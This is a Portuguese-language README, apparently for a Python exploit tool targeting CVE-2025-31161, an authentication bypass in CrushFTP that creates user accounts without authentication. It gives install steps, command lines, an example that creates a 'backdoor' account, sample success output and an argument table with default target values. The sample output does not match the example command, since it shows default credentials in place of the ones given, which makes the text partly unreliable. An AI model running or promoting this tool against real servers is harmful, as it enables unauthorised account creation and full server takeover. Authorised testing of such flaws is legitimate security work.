
🛡️ CVE-2025-31161 - Exploit de Bypass de Autenticação na Criação de Usuários do CrushFTP

Este exploit em Python tem como alvo servidores CrushFTP vulneráveis ao CVE-2025-31161. A vulnerabilidade permite a criação de conta de usuário não autenticada ao enviar um payload XML manipulado para a WebInterface, podendo resultar em comprometimento total do servidor.
Esta ferramenta é destinada apenas para testes de segurança educacionais e autorizados.
O uso não autorizado contra sistemas que você não possui ou sem permissão explícita para testar é ilegal e antiético.
requestscoloramaDebian/Ubuntu:
sudo apt update
sudo apt install python3 python3-pip -y
CentOS/RHEL:
sudo yum install python3 python3-pip -y
macOS (with Homebrew):
brew install python3
pip3 install requests colorama
python3 CVE-2025-31161.py --target_host <TARGET_IP> [--port <PORT>] [--target_user <ADMIN>] [--new_user <USERNAME>] [--password <PASSWORD>]
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!
[+] Preparing Payloads
[-] Warming up the target...
[-] Target is up and running
[+] Sending Account Create Request
[!] User created successfully!
[+] Exploit Complete! You can now login with:
[*] Username: AuthBypassAccount
[*] Password: CorrectHorseBatteryStaple
Gaurav Bhattacharjee (G4UR4V007)
| Argumento | Descrição | Valor Padrão |
|---|
--target_host | (Obrigatório) IP ou domínio do alvo | — |
--port | Porta da WebInterface do CrushFTP | 8080 |
--target_user | Nome de usuário admin (usado no payload) | crushadmin |
--new_user | Nome de usuário para nova conta não autorizada | AuthBypassAccount |
--password | Senha para o novo usuário | CorrectHorseBatteryStaple |